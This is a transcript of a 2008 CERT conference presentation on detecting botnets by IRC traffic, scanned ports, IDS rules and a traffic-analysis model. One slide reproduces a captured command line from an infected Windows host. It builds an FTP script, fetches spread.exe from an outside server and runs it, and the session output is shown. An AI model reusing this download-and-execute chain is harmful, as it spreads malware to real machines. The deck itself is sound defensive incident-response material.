Presentation is loading. Please wait.

Presentation is loading. Please wait.

China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC.

Published byBetty York Modified over 9 years ago

Similar presentations

Presentation on theme: "China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC."— Presentation transcript:

1 China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING jingtao@cstnet.cn CSTCERT,CNIC (+86)-010-58812898 CANS 2008 Indiana University 2008-10-21

2 China Science & Technology Network Computer Emergency Response Team Agenda About CSTCERT About Botnet Network Security Alert Future work

3 China Science & Technology Network Computer Emergency Response Team CSTCERT Overview Founded in 2002, CSTCERT(China Science and Technology Network Computer Emergency Response Team) CSTCERT is supervised by CSTNET. Services: –Incidents handling, include: attack,complaints, abnormal traffic detect and other related security incidents –research and development : Emergency Response –Security training : http://cert.cstnet.cn :+86-010-58812935 : cert@cstnet.cn

4 China Science & Technology Network Computer Emergency Response Team Our work 2007.9 -2008.9,we have handled 266 security events. –security incidents:205 –security complaints :61

5 China Science & Technology Network Computer Emergency Response Team Security status is very serious!-why? You can become a hacker very easily! –Know a little knowledge –Search hacker method from Internet –Many people share their hacker tools –If you want to pay some money, someone will teach you about hacker- tech.

6 China Science & Technology Network Computer Emergency Response Team About Botnet A botnet is a collection of computers, connected to the internet, that interact to accomplish some distributed task. Botnet typically refers to such a system designed and used for illegal purposes. The compromised machines are referred to as drones or zombies, the malicious software running on them as 'bot'. From: www.shadowserver.org

7 China Science & Technology Network Computer Emergency Response Team Botnet can cause ? and 。。。

8 China Science & Technology Network Computer Emergency Response Team How can we find Botnet? Active way: –Network protocol analysis IRC () –monitor some special TCP port(135/139/445/1433/22/2967……) –Check C&C(Command and Control Center) server address update from internet http://www.cyber-ta.org/ http://www.shadowserver.org Passive way: –honeypot

9 China Science & Technology Network Computer Emergency Response Team

10 Main Character of Botnet IRC message –Port scan:advscan, asc… –File download:download –Others: ping/pong,join,mode… scan tcp port:135/139/445/1433/22/2967 Vulnerability that botnet always exploit –Weak password (ssh/MS-SQL/windows) –Overflow vulnerability(MS- SQL/windows/software)

11 China Science & Technology Network Computer Emergency Response Team the host was controled by this method-1 Sometimes-use scan control command

12 China Science & Technology Network Computer Emergency Response Team the host was controled by this method-2 Sometimes-install malware

13 China Science & Technology Network Computer Emergency Response Team

14 C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe ftp> open spreadem.nowslate1703.info 21 Connected to spreadem.nowslate1703.info. 220---------- Welcome to Pure-FTPd [TLS] ---------- 220-You are user number 73 of 200 allowed. 220-Local time is now 00:15. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 2 minutes of inactivity. ftp> user spread baby 331 User spread OK. Password required 230-User spread has group access to: spread 230 OK. Current restricted directory is / ftp> binary 200 TYPE is now 8-bit binary ftp> get Remote file spread.exe Local file spread.exe 200 PORT command successful 150-Connecting to port 1555 150 83.1 kbytes to download 226-File successfully transferred 226 0.750 seconds (measured here), 110.70 Kbytes per second ftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 0 and downloaded 84 kbytes. 221 Logout. C:\Documents and Settings\jackie>

15 China Science & Technology Network Computer Emergency Response Team Network security alert Network security alert -IDS/IPS rule For port scan:Use some IRC message word:asc/advscan for network comunication with IRC: Ping/Pong,JOIN,PRIVMSG ……

16 China Science & Technology Network Computer Emergency Response Team Rules for IDS

17 China Science & Technology Network Computer Emergency Response Team Network security alert Network security alert -Network traffic data analysis We can build a simple mathematics model to describe Network Traffic data by Numerical Analysis method (NTNA model)

18 China Science & Technology Network Computer Emergency Response Team Data of tcp 1433 scan Data of tcp 22 scan Data of other port scan data of src ip data of counts amounts of target ip Count_1 Count_2 。。。 Count_n Count_1 Count_2 。。。 Count_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Src_ip1 Src_ip2 。。。 Src_ipn Src_ip1 Src_ip2 。。。 Src_ipn

19 China Science & Technology Network Computer Emergency Response Team NTNA model in practice

20 China Science & Technology Network Computer Emergency Response Team Future work Botnet research Monitoring and countermeasure for large-scale network worm Some improvement for the NTNA model –accuracy amendment –Extension to larger scale network traffic data (netflow) –Data mining

21 China Science & Technology Network Computer Emergency Response Team Thank you! jingtao@cstnet.cn (+86)-010-58812898

Download ppt "China Science & Technology Network Computer Emergency Response Team Botnet Detection and Network Security Alert Tao JING CSTCERT,CNIC."

Similar presentations

Firewall Simulation Teaching Information Security Using: Visualization Tools, Case Studies, and Hands-on Exercises May 23, 2012.

Firewall Simulation Teaching Information Security Using: Visualization Tools, Case Studies, and Hands-on Exercises May 23, 2012.
Welcome to SpyEye Front-end interface called “CN 1” or “Main Access Panel.”

Welcome to SpyEye Front-end interface called “CN 1” or “Main Access Panel.”
Honeypot 서울과학기술대학교 Jeilyn Molina 121336101. Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.

Honeypot 서울과학기술대학교 Jeilyn Molina Honeypot is the software or set of computers that are intended to attract attackers, pretending to be weak.
Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.

Exploits Dalia Solomon. Categories Trojan Horse Attacks Trojan Horse Attacks Smurf Attack Smurf Attack Port Scan Port Scan Buffer Overflow Buffer Overflow.
FTP Using FileZilla CS10001 – Computer Literacy. Step 1: Understanding the Interface Quickconnect Bar Message Log Area Local site navigation (either lab.

FTP Using FileZilla CS10001 – Computer Literacy. Step 1: Understanding the Interface Quickconnect Bar Message Log Area Local site navigation (either lab.
BotMiner Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee College of Computing, Georgia Institute of Technology.

BotMiner Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee College of Computing, Georgia Institute of Technology.
IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.

IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.

Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
Using FileZilla to FTP CS10001 – Computer Literacy Kent State University.

Using FileZilla to FTP CS10001 – Computer Literacy Kent State University.
COEN 252: Computer Forensics Router Investigation.

COEN 252: Computer Forensics Router Investigation.
INTRUSION DETECTION SYSTEMS Tristan Walters Rayce West.

INTRUSION DETECTION SYSTEMS Tristan Walters Rayce West.
Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.

Internet Relay Chat Security Issues By Kelvin Lau and Ming Li.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Common forms and remedies Neeta Bhadane Raunaq Nilekani Sahasranshu.

Common forms and remedies Neeta Bhadane Raunaq Nilekani Sahasranshu.
Botnets Uses, Prevention, and Examples. Background Robot Network Programs communicating over a network to complete a task Adapted new meaning in the security.

Botnets Uses, Prevention, and Examples. Background Robot Network Programs communicating over a network to complete a task Adapted new meaning in the security.
Accessing the Internet with Anonymous FTP Transferring Files from Remote Computers.

Accessing the Internet with Anonymous FTP Transferring Files from Remote Computers.
FTP Server prepared by Mohammed Ibrahim Programmer Computer & Internet Center Mosul University Presentation.

FTP Server prepared by Mohammed Ibrahim Programmer Computer & Internet Center Mosul University Presentation.
Botnets An Introduction Into the World of Botnets Tyler Hudak

Botnets An Introduction Into the World of Botnets Tyler Hudak
Introduction to Honeypot, Botnet, and Security Measurement

Introduction to Honeypot, Botnet, and Security Measurement
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.

MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.

Similar presentations

Ads by Google